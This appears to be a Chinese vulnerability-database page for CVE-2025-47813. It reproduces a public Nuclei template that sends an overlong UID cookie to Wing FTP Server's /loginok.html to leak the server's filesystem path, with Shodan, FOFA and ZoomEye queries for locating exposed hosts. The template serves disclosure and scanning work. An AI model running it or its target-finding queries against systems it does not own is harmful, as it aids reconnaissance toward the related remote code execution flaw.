CVE-2025-47813: Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie

日期: 2025-08-01 | 影响软件: Wing FTP Server | POC: 已公开

漏洞描述

Wing FTP Server versions prior to 7.4.4 are vulnerable to an authenticated information disclosure vulnerability (CVE-2025-47813). The vulnerability occurs due to improper validation of the 'UID' session cookie in the /loginok.html endpoint. Supplying an overlong UID value causes the server to respond with an error that includes the full local filesystem path. This can aid in further exploitation (e.g., CVE-2025-47812) by revealing the application’s file system layout.

PoC代码[已公开]

id: CVE-2025-47813

info:
  name: Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie
  author: rcesecurity,pdteam
  severity: medium
  description: |
    Wing FTP Server versions prior to 7.4.4 are vulnerable to an authenticated information disclosure vulnerability (CVE-2025-47813).
    The vulnerability occurs due to improper validation of the 'UID' session cookie in the /loginok.html endpoint. Supplying an
    overlong UID value causes the server to respond with an error that includes the full local filesystem path. This can aid in further
    exploitation (e.g., CVE-2025-47812) by revealing the application’s file system layout.
  reference:
    - https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
    - https://www.wftpserver.com
  classification:
    epss-score: 0.00627
    epss-percentile: 0.69346
    cve-id: CVE-2025-47813
    cwe-id: CWE-209
    cvss-score: 5.3
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:NH
  metadata:
    product: wftpserver
    vendor: wing_ftp_server
    verified: false
    shodan-query:
      - http.html_hash:2121146066
      - http.favicon.hash:963565804
      - title:"Wing FTP Server"
      - "Server: Wing FTP Server"
    fofa-query:
      - icon_hash="963565804"
      - title="Wing FTP Server"
    zoomeye-query:
      - app="Wing FTP Server"
  tags: cve,cve2025,wingftp,unauth,exposure

variables:
  longuid: "{{repeat('A', 2048)}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/loginok.html"

    headers:
      Cookie: "UID={{longuid}}"
      Content-Type: application/x-www-form-urlencoded

    body: "username=anonymous&password=test"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Server Path"
          - "Error"
          - ":\\\\"  # Windows path
          - "/usr/"  # Linux path
        condition: or

      - type: word
        part: header
        words:
          - "Wing FTP Server"

    extractors:
      - type: regex
        part: body
        regex:
          - '([a-zA-Z]:[\\/][^A\r\n]{10,})'
# digest: 4b0a00483046022100fc49853d2f958e90107f7fafe5bfc603387138dbbf0112f4ebc9881e65183168022100b34ad7cd24ad748d18b6ebac948a48f06c0455d2145a9a4cb21d8f14d38633db:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-47813.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

Wing FTP Server认证绕过导致远程代码执行(CVE-2025-47812) 无POC

CVE-2025-47812: Wing FTP Server <= 7.4.3 - Remote Code Execution POC

Wing FTP Server /loginok.html 代码执行漏洞 （CVE-2025-47812） 无POC

Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011） 无POC

Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419） 无POC

Wing FTP Server /loginok.html 代码执行漏洞（CVE-2025-47812）无POC

Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011）无POC

Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419）无POC